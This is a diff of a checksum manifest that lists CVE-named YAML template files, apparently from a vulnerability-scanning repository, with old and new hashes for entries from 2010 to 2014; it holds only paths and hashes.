+http/cves/2010/CVE-2010-0942.yaml:51aee94042e1c51f6e4ae83a7570bc8a03ab9142 +http/cves/2010/CVE-2010-0943.yaml:bcb2f92a695cf01e43e2607bd0f592ccab52eae1 +http/cves/2010/CVE-2010-0944.yaml:6ebfb78a8c08e8f869c4201d82d8710bb7e57a06 +http/cves/2010/CVE-2010-0972.yaml:e012cbad89136ab4459c2e50156ac149db85b7c5 +http/cves/2010/CVE-2010-0982.yaml:ba7de8d7ede494774f6f4152bb6467123ccf6cec +http/cves/2010/CVE-2010-0985.yaml:fb6a6cd2cd3452dee3372c8a8abf2760846caaf9 +http/cves/2010/CVE-2010-1056.yaml:13ec7519ade4207601dcefd26e1ff0c927be3fa9 +http/cves/2010/CVE-2010-1081.yaml:4d5ba802238d6266425961d9c3826f884365eb47 +http/cves/2010/CVE-2010-1217.yaml:675ea960945aa2b3c9c7da7826ca738282dc8b46 +http/cves/2010/CVE-2010-1219.yaml:5ccf3d872a945a83f8a666c2a66a034a614114b1 +http/cves/2010/CVE-2010-1302.yaml:713387a3c2435df92a11d4a5e20bdf769f527c58 +http/cves/2010/CVE-2010-1304.yaml:517b24756e22ad379a1907780223dcac189a2c72 +http/cves/2010/CVE-2010-1305.yaml:3f13bfeca25b606ac7b838fb6c04dd830bd05038 +http/cves/2010/CVE-2010-1306.yaml:09366c1f9c035ebea4905c29822cbd17a8714bbe +http/cves/2010/CVE-2010-1307.yaml:21f4d4b5abb0b807c7325179c2d3a1b62e091f90 +http/cves/2010/CVE-2010-1308.yaml:9c3ef30b20da4c05e5053111a5a64b189900d129 +http/cves/2010/CVE-2010-1312.yaml:5f08f4383e44d9b012bdaa01aa7ab3524a06c467 +http/cves/2010/CVE-2010-1313.yaml:01a218c1743250b06c199ca16707fad446c26a9d +http/cves/2010/CVE-2010-1314.yaml:50ea27e2cc2287b9ea60e13ae496f955af56ba51 +http/cves/2010/CVE-2010-1315.yaml:8865db6056ba594bebfb717c892c1de98683d5f5 +http/cves/2010/CVE-2010-1340.yaml:3cd8a36b9e4f5f6d596bca0aaa958417c4bd1e3c +http/cves/2010/CVE-2010-1345.yaml:7ec51afb48f62c3691225ac58f84219fd7b7bd6f +http/cves/2010/CVE-2010-1352.yaml:331b0ef82eeac186d249d498eab4fac12ad2c5e0 +http/cves/2010/CVE-2010-1353.yaml:15ceb8a09665db60633db9dd0e3bba7f2c3c1a5b +http/cves/2010/CVE-2010-1354.yaml:f25ca845086ee4fc64faee4af205047f385d282b +http/cves/2010/CVE-2010-1429.yaml:9871dd9a29aa7de792f24b52cfceba93cc138ad6 +http/cves/2010/CVE-2010-1461.yaml:f5c263679822d093f3ef61cda7e28235d7cbbd14 +http/cves/2010/CVE-2010-1469.yaml:455b778976a3883439f577659dc6bc1ab4864183 +http/cves/2010/CVE-2010-1470.yaml:4f070037c75ba4b47d3d5f5f1263fd3546feb0dd +http/cves/2010/CVE-2010-1471.yaml:d29107b4c69ff97b0b350679037d6059bde0bbee +http/cves/2010/CVE-2010-1472.yaml:3e703def9ee85950aade90bc19f46fcc72e9d432 +http/cves/2010/CVE-2010-1473.yaml:1b8f4634f7fdc45d32d1b2ac9a8a484f162fb092 +http/cves/2010/CVE-2010-1474.yaml:cdbee25ebcd464c1a910ab80a00a05205703c9ff +http/cves/2010/CVE-2010-1475.yaml:5cb7f2e6a57382b7312d73ae77c03f06d0fa9f30 +http/cves/2010/CVE-2010-1476.yaml:7fc900c86f68849b305e035e0c74cdb6156c23b2 +http/cves/2010/CVE-2010-1478.yaml:0c4e521f0e0d4c8310ca49bf46f519f1ef74d353 +http/cves/2010/CVE-2010-1491.yaml:99b26e68d7de721f968d14e72b2f62cc33824070 +http/cves/2010/CVE-2010-1494.yaml:2a49c34e1ea56519277356766c48a52b676d89ae +http/cves/2010/CVE-2010-1495.yaml:1226e78a606f7321f47b5b31bfe48aa79fdb3620 +http/cves/2010/CVE-2010-1531.yaml:2fd8006638f0c6bbb6a709c506e5dfe6776e5366 +http/cves/2010/CVE-2010-1532.yaml:c34a830e92cb2fa9ea889f1f7fc54963ff23ccef +http/cves/2010/CVE-2010-1533.yaml:e499a5536852f724931abb33ca7a07708f67fb57 +http/cves/2010/CVE-2010-1534.yaml:496655b04550c26710d2c9f35e53d8425ebbf5e8 +http/cves/2010/CVE-2010-1535.yaml:3a2d04f891489858d7733a69f5450432766edc55 +http/cves/2010/CVE-2010-1540.yaml:96db3e4b3a06d40087fa22b2164d997e0b0429e4 +http/cves/2010/CVE-2010-1586.yaml:f1e02b912bbd1738bdb7dfabb2b1bc6eb774f3c8 +http/cves/2010/CVE-2010-1601.yaml:665da581c3033b20673b20b1d37590121f1740e5 +http/cves/2010/CVE-2010-1602.yaml:164315b5825f5770410be10bace74de41d9bea37 +http/cves/2010/CVE-2010-1603.yaml:a874ac69190af5874934bb3d739af6cc185fdcae +http/cves/2010/CVE-2010-1607.yaml:6dfd123ba7f1f878b4e0679a054df5ede6402211 +http/cves/2010/CVE-2010-1653.yaml:568090f288c966f9ef7ee8807da77a9276d83590 +http/cves/2010/CVE-2010-1657.yaml:378b3632bd5a24cf8988a82d323f781a6e417b82 +http/cves/2010/CVE-2010-1658.yaml:0c5fa849b051253e2340f9048acaf165be4eaa45 +http/cves/2010/CVE-2010-1659.yaml:3fbe7da3cc622da8c5e5f4def94a085ea9438406 +http/cves/2010/CVE-2010-1714.yaml:e616d81111fac852c7d06c21b7133d757562848d +http/cves/2010/CVE-2010-1715.yaml:19ae83aeb9d722843deafbfbad1b692e4fef7903 +http/cves/2010/CVE-2010-1717.yaml:7dfbfbbe050f590cecc20a49c970aa38b3fa9187 +http/cves/2010/CVE-2010-1718.yaml:ebcbd89748ead28fd4ec642ab30f635d9764cc79 +http/cves/2010/CVE-2010-1719.yaml:ac0ca804bc4aceb9fc7e3060ada0a6e9d6abc68c +http/cves/2010/CVE-2010-1722.yaml:d824d1bfbe853b2fa1becc12b23a2a6d7249a326 +http/cves/2010/CVE-2010-1723.yaml:a9c9a226d5d1f82ab5dfe0c55a4e2977161aab88 +http/cves/2010/CVE-2010-1858.yaml:e181372ef53675933c01258d4fedf46aa0c2c9eb +http/cves/2010/CVE-2010-1870.yaml:81cbba41d7209176c4c3a46fa7ce6f7b4104f861 +http/cves/2010/CVE-2010-1875.yaml:f4a7bc1f6a4114a144b52c596bee4b3198d178c1 +http/cves/2010/CVE-2010-1878.yaml:625837d1e51807a6c13c43d4da0b439edff64e4b +http/cves/2010/CVE-2010-1952.yaml:d13e58c5bca8d822da69336d0f5f4d80d3d6cd4b +http/cves/2010/CVE-2010-1953.yaml:2aa5c1518d35ae9ec616f28d14399625e677f770 +http/cves/2010/CVE-2010-1954.yaml:6ba646eef471834d63e3e7475b00ab08903d5169 +http/cves/2010/CVE-2010-1955.yaml:6bd4fe665991c3ad067805387af8809cfefbc82d +http/cves/2010/CVE-2010-1956.yaml:be682b62b6328ee2a3f96daffc20d42baa777452 +http/cves/2010/CVE-2010-1957.yaml:5ea00f924c6254b80f5c4094e1ba5f08e2fd6b1f +http/cves/2010/CVE-2010-1977.yaml:e964dfc97bd04ac1c4f97121246abdf9d79c0c8b +http/cves/2010/CVE-2010-1979.yaml:194fd94d1253f1dad3f96f6fd7e8b1986f49b1ba http/cves/2010/CVE-2010-1980.yaml:628e9d5edbc92cdcfaf7a75569d41665b185990d -http/cves/2010/CVE-2010-1981.yaml:9dbfcb0f0446ae83d0a1237538d2fc1696165358 -http/cves/2010/CVE-2010-1982.yaml:7c0be10f0f0a8ae15ffaeaf7ee1cc83072bc5da4 -http/cves/2010/CVE-2010-1983.yaml:8e0688712a73c8f2159f3a8b1475f4dac6467acf -http/cves/2010/CVE-2010-2033.yaml:55ba941c66ad6c280ae41bfd0eebb9ccc4012d7b -http/cves/2010/CVE-2010-2034.yaml:2066787208cea5258649c42279730b5e158d0b8a -http/cves/2010/CVE-2010-2035.yaml:fd2366d26ac7454397490b1b03aa12cefba60969 -http/cves/2010/CVE-2010-2036.yaml:b942299adba15d18def792019ab9ba49705a20af -http/cves/2010/CVE-2010-2037.yaml:bea0a880ae90553d45d745909bee06233fccc735 -http/cves/2010/CVE-2010-2045.yaml:dd495e09ea4c97317101c92424fd2e21a564d280 -http/cves/2010/CVE-2010-2050.yaml:b9ef0f6978b4acf93be949f63a711206c1d7679b -http/cves/2010/CVE-2010-2122.yaml:c81d8e344b7779599d0dca019618535f945ff631 -http/cves/2010/CVE-2010-2128.yaml:17a5aa9f39b3f50eaad83c2927d1bfb324734156 -http/cves/2010/CVE-2010-2259.yaml:d59d6dc57a395cf394b26c10e11c8ae5aa41dc77 -http/cves/2010/CVE-2010-2307.yaml:cb3959368be94653cbd5e27e48f9f21e86a906b9 -http/cves/2010/CVE-2010-2507.yaml:eaf90a8c2d2fadb5e9ebbb29a71d8988e261171b -http/cves/2010/CVE-2010-2680.yaml:2d01f8337d48d5ecb851aa286d8014e7a806b30c -http/cves/2010/CVE-2010-2682.yaml:6413a35a80a1e4ab16ddd4723d6d29bb95e80baf -http/cves/2010/CVE-2010-2857.yaml:3a09541a6ce70a5ab2a0c749bc9e00779fcada67 -http/cves/2010/CVE-2010-2861.yaml:aa3420124d10bb8f4c75bd27cf88bcc92358a460 -http/cves/2010/CVE-2010-2918.yaml:193f6f1292305f878a8463f9c910cda64cccb057 -http/cves/2010/CVE-2010-2920.yaml:4d5428e588c68c45d8d333330ba89ee12ab532cc -http/cves/2010/CVE-2010-3203.yaml:97439314b5b4e8bdacb7e8b332a20f44376bb73e -http/cves/2010/CVE-2010-3426.yaml:6b0bace3aa371fc5f889ea05817a02bf6de6b890 -http/cves/2010/CVE-2010-4231.yaml:30940dc351acf8d93d70e5633f1300d6d0be89fe -http/cves/2010/CVE-2010-4239.yaml:9ad7e0a70210e9b9829d9ece10cad5ec082037db -http/cves/2010/CVE-2010-4282.yaml:49e197cc434068fc22a05e3d64221fe64e51dd20 -http/cves/2010/CVE-2010-4617.yaml:1d9516407c3132162e81c12496f90cbad852be2d -http/cves/2010/CVE-2010-4719.yaml:78935ee3f802448a4b0e50d7d340453701c6273d -http/cves/2010/CVE-2010-4769.yaml:1cfc14b6b07d35e26f08b18b859642ab0b7d28b6 -http/cves/2010/CVE-2010-4977.yaml:24a87be842329bdb6f62ee86f2923ac3407b11fc -http/cves/2010/CVE-2010-5028.yaml:2155e4e3f86c85bd24d5151c28b46d971f246601 -http/cves/2010/CVE-2010-5278.yaml:0dcbe2705b5afdfe3371dfc4294fff22bbcbe7fb -http/cves/2010/CVE-2010-5286.yaml:d0b48238df5004b512541f1d49831e3652f155bf -http/cves/2011/CVE-2011-0049.yaml:89743c422a6e1d20c7d34f4654f20e9ab2189aaf -http/cves/2011/CVE-2011-1669.yaml:a2b943f750d449aab238d4c4976b4a51a189500b -http/cves/2011/CVE-2011-2744.yaml:4c9fe985820a16dd10d520499b24b90e7d82efc1 -http/cves/2011/CVE-2011-2780.yaml:f9d80c748071c164fa14df44b826715844809daf -http/cves/2011/CVE-2011-3315.yaml:70a0976b63ab7528ec56537ac105552aab1e56af -http/cves/2011/CVE-2011-4336.yaml:cacf6887a538ae9ff971ef34ff234d2c6be59b5d -http/cves/2011/CVE-2011-4618.yaml:70517594ebf8902b464f518d9615c7f10d096427 -http/cves/2011/CVE-2011-4624.yaml:504d9560716c064ed394f615fa32d942d25f8c34 -http/cves/2011/CVE-2011-4804.yaml:04166d8601dbf0397c622ce0e624cd415290c69a -http/cves/2011/CVE-2011-4926.yaml:c308fc283d7ef06fdba47b797f7e43782499e104 -http/cves/2011/CVE-2011-5106.yaml:01e577559c5049db1d8b28e94637f37534db7845 -http/cves/2011/CVE-2011-5107.yaml:59b5cdf1a4783cbe6bdb5e8e6fb2634902d57567 -http/cves/2011/CVE-2011-5179.yaml:6c43fc991f264a411cc480880d34080d5b783f1a -http/cves/2011/CVE-2011-5181.yaml:c910b6b3f992c8cdda09f4c56d1129cb4708665d -http/cves/2011/CVE-2011-5252.yaml:b731edf8a0ccdc40501a92e080e0d2de31cc7821 -http/cves/2011/CVE-2011-5265.yaml:9dc026c6e5278d5767ff91d12aeccd3c331fe1f1 +http/cves/2010/CVE-2010-1981.yaml:f8753a346f7c77a338d4579de3d197cd3fec374a +http/cves/2010/CVE-2010-1982.yaml:2d67abc49cbd22e3110f67f1579fcf8a7d5fad05 +http/cves/2010/CVE-2010-1983.yaml:96deb9bfe3761bf6724353fe05fe58ed467d935c +http/cves/2010/CVE-2010-2033.yaml:f03028b593df7a6d9e5a330e23c19d9e9eee540a +http/cves/2010/CVE-2010-2034.yaml:a2ca191222b2e46cb1c7ed3de8933bf3033cc185 +http/cves/2010/CVE-2010-2035.yaml:84d26aa72e010f6ddb2bcdf6cd8110f3276c2513 +http/cves/2010/CVE-2010-2036.yaml:01336d2186d5508c80c4338564cdaea826233bf6 +http/cves/2010/CVE-2010-2037.yaml:06fc20aa09ca299c1ae3d26763c66d2f8c2fdc4a +http/cves/2010/CVE-2010-2045.yaml:d0ed9b99ed7e2a002b4b5781a3afab0646933243 +http/cves/2010/CVE-2010-2050.yaml:e95a9da8f41ce2fb446883f2846e141e3503a128 +http/cves/2010/CVE-2010-2122.yaml:2046db78c4995f8e4d21ce0b020449f76c778658 +http/cves/2010/CVE-2010-2128.yaml:1147a8f5de3c8a30d27d8a0d4fa21af5d45b9761 +http/cves/2010/CVE-2010-2259.yaml:5856b2fd8f8fdc7df09a3a251a64839bd0bad7fb +http/cves/2010/CVE-2010-2307.yaml:e6b68ada40844f83a457e199eaa0d06c319d08b3 +http/cves/2010/CVE-2010-2507.yaml:ce50086030655fb8a276fde58f67e7193d654758 +http/cves/2010/CVE-2010-2680.yaml:ffb63dcfb8d283ace12775cdb234dba95c649436 +http/cves/2010/CVE-2010-2682.yaml:7e3dafd575ab33baa97f559f9c588270b62fd7dd +http/cves/2010/CVE-2010-2857.yaml:757c4411e4573c6525b9b2dec0173f5c4239a0df +http/cves/2010/CVE-2010-2861.yaml:bdaa0902726befa8c6a50d2eccb234861da20ca2 +http/cves/2010/CVE-2010-2918.yaml:81c13732873e0f93b5beb19e8a12fc850200aec2 +http/cves/2010/CVE-2010-2920.yaml:65e327241dd12a652592516d18d62933ebe728f3 +http/cves/2010/CVE-2010-3203.yaml:44514d18c6bd8e53fe3f04aa2cc357a311e394ec +http/cves/2010/CVE-2010-3426.yaml:e2e3ffda04b529019b30cc731d2a66f3a09a9a39 +http/cves/2010/CVE-2010-4231.yaml:90cd74bb4baadc557fcadcbd0c9ad103b558af34 +http/cves/2010/CVE-2010-4239.yaml:a732d1e52796d5c27c47bc7396ca214d8c4196b5 +http/cves/2010/CVE-2010-4282.yaml:c249e3d135bc547cb485704060e5fa8d33216664 +http/cves/2010/CVE-2010-4617.yaml:14115a4d97514dfc0673946d209ceb4d9dd3cf89 +http/cves/2010/CVE-2010-4719.yaml:2ef82e93239f51b45a8dc1a438d59909672ee882 +http/cves/2010/CVE-2010-4769.yaml:7987a6fab9424f6fbc34e5502d02efa8817fb87f +http/cves/2010/CVE-2010-4977.yaml:444ef883451c95a96fd5cdf6ea0d40f8bef911fe +http/cves/2010/CVE-2010-5028.yaml:b0c2556e03cd129bda050da98189353fc69d47f0 +http/cves/2010/CVE-2010-5278.yaml:e9009b21bc795ef4ddac2a19482f07301c7f4e04 +http/cves/2010/CVE-2010-5286.yaml:08c18c824cb4c83e92923d670f84a0055f25b0a2 +http/cves/2011/CVE-2011-0049.yaml:d5062504ba9bb18ea444be133cfd2031b7f1da5e +http/cves/2011/CVE-2011-1669.yaml:bb0cacd809a323bfe216a18a301724c669189d5f +http/cves/2011/CVE-2011-2744.yaml:4afda59ac2b41a90292143de1df5d8d598cddfd2 +http/cves/2011/CVE-2011-2780.yaml:330522a671f1b490b6349de04c657d888ec358e4 +http/cves/2011/CVE-2011-3315.yaml:4b5fca69e0c2f530381d93b564b93b043b867031 +http/cves/2011/CVE-2011-4336.yaml:d3ff8eb20d73ff5636648b796573db9487fb9e45 +http/cves/2011/CVE-2011-4618.yaml:68619082b93ff4219068cec1755ea510d18820a4 +http/cves/2011/CVE-2011-4624.yaml:b8eb6ae603b050a3e4ee8c4474dd38454fa1c011 +http/cves/2011/CVE-2011-4804.yaml:15b7cbb7fd08ef173302d7f3b1eaffba347d9e31 +http/cves/2011/CVE-2011-4926.yaml:94f6879bb1b29842856a391556601ef3c06ba20f +http/cves/2011/CVE-2011-5106.yaml:28b9710faa53de40cc725d64313dd4928de703bc +http/cves/2011/CVE-2011-5107.yaml:6ec4cd60d35b7de9e67a63a78df39dafe3c35c67 +http/cves/2011/CVE-2011-5179.yaml:43099a88aaaf464ad7f3fcc6b17b4836ab95324e +http/cves/2011/CVE-2011-5181.yaml:ef29b33a99c4bb8cf73ef9d95aa31b3248337125 +http/cves/2011/CVE-2011-5252.yaml:abcbd78aeaf3c16e73b1e89aebb822e686bc2f25 +http/cves/2011/CVE-2011-5265.yaml:382a468d4cab5982762bda4eccc251e65f0ee23c http/cves/2012/CVE-2012-0392.yaml:870848813498e961d6ebf12806eb8c9582880c00 http/cves/2012/CVE-2012-0394.yaml:854a93536e0fb708cc804c6e07b817262595103b -http/cves/2012/CVE-2012-0896.yaml:c332ce2cf518fa970f341f4dee1439d1635fd6be -http/cves/2012/CVE-2012-0901.yaml:91349ef78f72dce0ae9d99e172a2980b120aa060 -http/cves/2012/CVE-2012-0981.yaml:5c05e23375457c8d7ca533518efce73290db9d87 +http/cves/2012/CVE-2012-0896.yaml:ac9685e4ec8025bb947a9c925d3e6569442f7317 +http/cves/2012/CVE-2012-0901.yaml:2c8f43b0aa66ebe25311daf867fe383c9db116b1 +http/cves/2012/CVE-2012-0981.yaml:876bafa003f5082d4d545499e5e168e42f80d519 http/cves/2012/CVE-2012-0991.yaml:5229d4c1d04a9498d84f862ae04eae9b17c75b19 -http/cves/2012/CVE-2012-0996.yaml:a3243f7c6ad50753035f7a602982f6ec63e5938c -http/cves/2012/CVE-2012-1226.yaml:5b31d663b4c1d51eafa152f3d3c807dae6df8a55 +http/cves/2012/CVE-2012-0996.yaml:6cdc4073a42af088e6a9c6e9d7b486ad0c6cd6a7 +http/cves/2012/CVE-2012-1226.yaml:d470d1bfa5c573a5bbe9792494a43c220a794a0a http/cves/2012/CVE-2012-1823.yaml:63defc94ed6c51d34daa5a884ed8a9693897a506 -http/cves/2012/CVE-2012-1835.yaml:b2321c8dc1e5d305a8cac0fb0c7578413025439f -http/cves/2012/CVE-2012-2371.yaml:713d791c101cad8c0eaa72dee262393c64242f42 +http/cves/2012/CVE-2012-1835.yaml:8220874976b4191602ba8c364d7120330238f549 +http/cves/2012/CVE-2012-2371.yaml:3516fd55a144fba5bef2476c3cad22c3644a00e8 http/cves/2012/CVE-2012-3153.yaml:70b09e64db26f2a4b79afb9fb81fd869003586c4 -http/cves/2012/CVE-2012-4032.yaml:cfb4826e1e8797e74a0f3bcd614e2d760d3259b6 -http/cves/2012/CVE-2012-4242.yaml:704fa2077d469b23400a17dde7f9c983fedb7fef -http/cves/2012/CVE-2012-4253.yaml:a67ba8b45e6f3d7634cc100d4fc2a4c3c2f84e3d -http/cves/2012/CVE-2012-4273.yaml:9729b699308d67991f65a9571cf2adfadfd75db3 -http/cves/2012/CVE-2012-4547.yaml:8be2b19946aae9cafaa46da6e25327507a5f75c7 -http/cves/2012/CVE-2012-4768.yaml:c7f5731eee71e91a9e7ece10c070f734a6614d27 -http/cves/2012/CVE-2012-4878.yaml:f744f77205895bd037d68e563bccecc28f2a9e0e -http/cves/2012/CVE-2012-4889.yaml:de3b98d1b6059c0c9951d809eb88a0e7bea29e0a -http/cves/2012/CVE-2012-4940.yaml:19d983c3f365121bc33fd6bb3fe3a927903f8d55 -http/cves/2012/CVE-2012-4982.yaml:d9a04f7bd5c24fdec637b7d2521b95063dceb8aa -http/cves/2012/CVE-2012-5321.yaml:c3011e86ef7c067f908c77b93ddcd6d713a86137 -http/cves/2012/CVE-2012-5913.yaml:fc90ef212cb851c9f913a739fc0bcfaa3cbb0512 -http/cves/2012/CVE-2012-6499.yaml:b3e9019012f6d15ed28d8e41db38668454e77fdb -http/cves/2013/CVE-2013-1965.yaml:a3d4d57505165d957812a80b18787df98fe2d855 +http/cves/2012/CVE-2012-4032.yaml:b8a9d7907c50a4ede261bf1ec0aaf0dba6ec1f72 +http/cves/2012/CVE-2012-4242.yaml:fd0efe30d8243d3c3ecdb2b13a6c7b36b7518852 +http/cves/2012/CVE-2012-4253.yaml:32961020f9efc291293251113ce2986c35a00a91 +http/cves/2012/CVE-2012-4273.yaml:36f1c0e8e84a11e08688374a66db4cb0ea0a5075 +http/cves/2012/CVE-2012-4547.yaml:1dc47bca6300a8d8594795fc8a79f36c3196e90e +http/cves/2012/CVE-2012-4768.yaml:4bf1680622dc49cd4e7384dbe1a76816882aa6a6 +http/cves/2012/CVE-2012-4878.yaml:212b7f93ab8727231227ae777bee5e5e407e8147 +http/cves/2012/CVE-2012-4889.yaml:ddfce4f62e29fbdec074ab8e9a7ec6ca6233ca3c +http/cves/2012/CVE-2012-4940.yaml:45e92e393f3f882cbbec68a50140ff3aa8576a87 +http/cves/2012/CVE-2012-4982.yaml:16586e2d03df9346acc130dfa99f6b8acdf3928b +http/cves/2012/CVE-2012-5321.yaml:2c851c7b795a64180bdeee7c119cf9cbc4f2c9d8 +http/cves/2012/CVE-2012-5913.yaml:9e5a14aadab47608bd3f49c2e05b4ed50246b82f +http/cves/2012/CVE-2012-6499.yaml:a66678093efa6069a4318a6534afdef0fa1b9118 +http/cves/2013/CVE-2013-1965.yaml:037f4058df778d3411a43c4006d37014ba98e40d http/cves/2013/CVE-2013-2248.yaml:7123359757dbc17e491daecfcb4ad29f035091f8 -http/cves/2013/CVE-2013-2251.yaml:8148df6f6a12b81e077cc47ecb4d1088a8eec2dd -http/cves/2013/CVE-2013-2287.yaml:aacbcb0a3ccf7462f9d51f7513374d1bcd777312 -http/cves/2013/CVE-2013-2621.yaml:d56fd11355ea259f68f8e7f2ef9aab1e05f1fe6c -http/cves/2013/CVE-2013-3526.yaml:d58eac10c795978f472d4213c8fe99236026d79d +http/cves/2013/CVE-2013-2251.yaml:030a25a2f800098c7a64105c2f62330f731aea40 +http/cves/2013/CVE-2013-2287.yaml:7e183a7d52527cfc6f410d9b28fa3d25cd51c8c5 +http/cves/2013/CVE-2013-2621.yaml:4aba823c97e2912b3f997d86e6f105718e462ffb +http/cves/2013/CVE-2013-3526.yaml:46b4c43a7640ae7191e71eed80e09d2066471791 http/cves/2013/CVE-2013-3827.yaml:388b6a3ef3b1d66a8b5a13ec4a7190da7d13d16e -http/cves/2013/CVE-2013-4117.yaml:b708b57864deea1a454c414042500200b27e36e1 -http/cves/2013/CVE-2013-4625.yaml:ff6dde9ebb32d8087e757f3d070172f3e1c273e8 -http/cves/2013/CVE-2013-5528.yaml:57594cdc6680fc4ed8de589c64b5c22800ddc9f4 -http/cves/2013/CVE-2013-5979.yaml:aa031123a71b457c3a363dbd36a3e98633b1a31a -http/cves/2013/CVE-2013-6281.yaml:b4f7311777f0bd308732bbb60a1d6f17cee43682 +http/cves/2013/CVE-2013-4117.yaml:ac1cd4941668f6c44bca824b19ad8616843d44cd +http/cves/2013/CVE-2013-4625.yaml:f1efa1e914ecbf3f47eebcce3328570ae5ef7e3e +http/cves/2013/CVE-2013-5528.yaml:82797106d1110dfa4f4a8b65e0b52d92558a7596 +http/cves/2013/CVE-2013-5979.yaml:3927933e329273ab1d58e5e21fd7b04db3d2adcf +http/cves/2013/CVE-2013-6281.yaml:0c94643d6a0f4c73e58547eb4c2d948606ce0ba0 http/cves/2013/CVE-2013-7091.yaml:a6a3437e9498279721e86c78a8860739803c981a -http/cves/2013/CVE-2013-7240.yaml:99ca5c69e0de13a639bc94556484f91d06c43d71 -http/cves/2013/CVE-2013-7285.yaml:2fdfde950141b15e3774053499580edeffef9ea2 -http/cves/2014/CVE-2014-10037.yaml:e952844cda4e0c334fe8bb0e4214160e3073f71b -http/cves/2014/CVE-2014-1203.yaml:98f05a5c2146df97806cd8e5410d91cb36c7c99f -http/cves/2014/CVE-2014-2321.yaml:e98fe9d3219f3fc436bf863e1ba4cbf59947170b -http/cves/2014/CVE-2014-2323.yaml:58ee0c6b7266bc1f63433c2bdae681c5466f9711 -http/cves/2014/CVE-2014-2383.yaml:b660f6a2184925f503b061d5af9dae6db2744744 -http/cves/2014/CVE-2014-2908.yaml:c09d63ad52e7d0ded3ba06eae49b7af33383ecb6 +http/cves/2013/CVE-2013-7240.yaml:8d84b07da03fae8b33fd29491dc14967b9030b51 +http/cves/2013/CVE-2013-7285.yaml:0acef59616924c38293ad4c032ebfea8ebde650c +http/cves/2014/CVE-2014-10037.yaml:c2da2362581d46d7be17aced7601f8c85af6d2f2 +http/cves/2014/CVE-2014-1203.yaml:c4ebfc6fdaf399f826f0680950dbe1b4340bd38c +http/cves/2014/CVE-2014-2321.yaml:43d1d2aa9c3c3f16c491bb7c6611d2c3ca590afc +http/cves/2014/CVE-2014-2323.yaml:1c5a74388d2d2bada9df2ee280faa2e01d979262 +http/cves/2014/CVE-2014-2383.yaml:05c3838095285ee2b72c700f7b64f91a30275c5f +http/cves/2014/CVE-2014-2908.yaml:bc1bcf89efcb1f1fe66635f1fe580d55b4050508 http/cves/2014/CVE-2014-2962.yaml:3c50dddadca2855347c8cf0e8a5207aae63df90c http/cves/2014/CVE-2014-3120.yaml:2ec27e7e619a7095db3f379abc8569bb004e8208 http/cves/2014/CVE-2014-3206.yaml:29c86e6683622add5384b11565e8ff549c409561 http/cves/2014/CVE-2014-3704.yaml:d71b56809f076a074a9b5cb0499714902d43dd48 -http/cves/2014/CVE-2014-3744.yaml:26ce14f82e853fb7aca302fbb1fdbe571ba564a1 +http/cves/2014/CVE-2014-3744.yaml:dc7e472f3bd7a30b81ce7971ab472e398b5b7333 http/cves/2014/CVE-2014-4210.yaml:177e697535e3966bf7e76097333285624d79920f -http/cves/2014/CVE-2014-4513.yaml:c6695937ad2710b050494439cbbaa7b7847c7ecf -http/cves/2014/CVE-2014-4535.yaml:18d300d6a1fd66607f281a4a53387f03ebb80369 -http/cves/2014/CVE-2014-4536.yaml:42fe475a001f9ded8c03b7584cde740b7897691c -http/cves/2014/CVE-2014-4539.yaml:9908209d24fc44c4ca012bb4cb94b6561daeee33 -http/cves/2014/CVE-2014-4544.yaml:f1cd1921028df066fd074e80bdde8a9c4558dee1 -http/cves/2014/CVE-2014-4550.yaml:ebb62f330a185954ab464f877ba0182530441d52 -http/cves/2014/CVE-2014-4558.yaml:1126d6131a7b45cd3fd02542357ac0490c5371bd -http/cves/2014/CVE-2014-4561.yaml:fb885bfdc1ff151b82e7413defcc61ff80ba9e35 -http/cves/2014/CVE-2014-4592.yaml:53fb636b398ffaa6d7b8a27a88ac943a7af6c015 -http/cves/2014/CVE-2014-4940.yaml:b49f9849ef16057365473861d98aea7f0762041f -http/cves/2014/CVE-2014-4942.yaml:15f448ab6fd5c410d72ea95be9eafb3951f169da -http/cves/2014/CVE-2014-5111.yaml:548e19a4e1f69ba82ca1671b31ce0282b97f3042 -http/cves/2014/CVE-2014-5258.yaml:01d0571d5edb9d04e1228c722db5f4a98cd46a48 -http/cves/2014/CVE-2014-5368.yaml:73961b2b978f65c16ef56e6be40821dfa8931318 +http/cves/2014/CVE-2014-4513.yaml:fffc1ba3344754d8eb53c016cb77a51881564a05 +http/cves/2014/CVE-2014-4535.yaml:283cef65117afeb4c8cab1788ebdef7a4a1c83cb +http/cves/2014/CVE-2014-4536.yaml:9371430d16759616faf47df0947b038a1b6a9ebe +http/cves/2014/CVE-2014-4539.yaml:d44c0cef944dd7012e00c475da48fa9568482725 +http/cves/2014/CVE-2014-4544.yaml:61d21e37b703b0ef72858d349d4a8463aa4ffdfe +http/cves/2014/CVE-2014-4550.yaml:bc2db6f3ef154f6bc4e7aae9e9b68f22abbbe6c6 +http/cves/2014/CVE-2014-4558.yaml:0eee820d0bb5fc0c01a565f9fac747681c16249e +http/cves/2014/CVE-2014-4561.yaml:f7f8285d401d10146c3c63298984aeb4b14b7141 +http/cves/2014/CVE-2014-4592.yaml:dfe45f374b6cbc77bda906823c5d0e0ce17a6d3b +http/cves/2014/CVE-2014-4940.yaml:8b14234147a6d33d2f0f6bdaac1e489ccee4e9d4 +http/cves/2014/CVE-2014-4942.yaml:454b18b506270b74ecb83481b072dee12a345bd5 +http/cves/2014/CVE-2014-5111.yaml:21871f0d58291747c2a922bfe0b1ad8bc1d7c57f +http/cves/2014/CVE-2014-5258.yaml:e6dab868cb05fdd0a2ab0d52c7496e84ff3992fa +http/cves/2014/CVE-2014-5368.yaml:236dafc46761fa760e9d4c7732d3ce6aa2a6e054 http/cves/2014/CVE-2014-6271.yaml:1e66aea403b8845fc9a535c27a7a1d9f13fd3e75 http/cves/2014/CVE-2014-6287.yaml:ed30b952edd0a760ec920f6cc8c23e1a70e4ef4b -http/cves/2014/CVE-2014-6308.yaml:1c405b38c8c5825a9a8525c701e97511a29d9d53 +http/cves/2014/CVE-2014-6308.yaml:0d9bea7ac9a165e72168ed2ce420c8d2eea15309 http/cves/2014/CVE-2014-8676.yaml:4711f5e60c2eda0c4f02c940d4b279386ac895f9 -http/cves/2014/CVE-2014-8682.yaml:c29478e6ba11ee1b460aaba90cdc7054368774ea -http/cves/2014/CVE-2014-8799.yaml:529e3b33ef48629cd908cc450871c268c7db7a7c +http/cves/2014/CVE-2014-8682.yaml:df63204a23cb37b2ade5311e8c460b0320bf6882 +http/cves/2014/CVE-2014-8799.yaml:5008db7da8410421df2dab891efbb93566840b16 http/cves/2014/CVE-2014-9094.yaml:1616c40727ad9bdb6a2ce1ef817203caf330f0d2 